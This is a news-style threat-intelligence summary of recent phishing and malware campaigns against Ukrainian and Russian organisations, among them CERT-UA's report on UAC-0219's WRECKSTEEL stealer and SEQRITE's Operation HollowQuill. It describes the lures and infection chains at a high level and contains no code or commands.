According to a report by the Computer Emergency Response Team of Ukraine (CERT-UA), the country has experienced at least three cyber attacks targeting state administration bodies and critical infrastructure facilities. The primary goal of these attacks is to steal sensitive information.
The campaign involves the use of compromised email accounts to send phishing messages with links to legitimate services such as DropMeFiles and Google Drive. Additionally, the links are sometimes embedded within PDF attachments to deceive the recipients.
The phishing messages aim to create a sense of urgency, claiming that a Ukrainian government agency plans to cut salaries. The recipients are then urged to click on the link to view the list of affected employees, which ultimately leads to the download of a Visual Basic Script (VBS) loader.
The VBS loader is designed to fetch and execute a PowerShell script, which is capable of harvesting files matching specific extensions and capturing screenshots. The activity has been attributed to a threat cluster tracked as UAC-0219, which has been ongoing since at least fall 2024.
CERT-UA has given the VBS loader and the PowerShell malware the moniker WRECKSTEEL. However, the attacks have not been attributed to any specific country.
Kaspersky has also warned of a threat actor known as Head Mare, which has targeted several Russian entities with a malware known as PhantomPyramid. This malware is capable of processing instructions issued by the operator over a command-and-control (C2) server and downloading additional payloads like MeshAgent.
Russian energy companies, industrial enterprises, and suppliers and developers of electronic components organizations have been targeted by a threat actor codenamed Unicorn, which dropped a VBS trojan designed to siphon files and images from infected hosts.
SEQRITE Labs has revealed that academic, governmental, aerospace, and defense-related networks in Russia are being targeted by weaponized decoy documents, likely sent via phishing emails, as part of a campaign dubbed Operation HollowQuill. The attacks are believed to have started around December 2024.
The attacks use social engineering tactics, disguising malware-laced PDFs as research invitations and government communiqués to entice unsuspecting users into triggering the attack chain.
Security researcher Subhajeet Singha explained that the threat entity delivers a malicious RAR file containing a .NET malware dropper, which further drops a Golang-based shellcode loader along with the legitimate OneDrive application and a decoy-based PDF with a final Cobalt Strike payload.
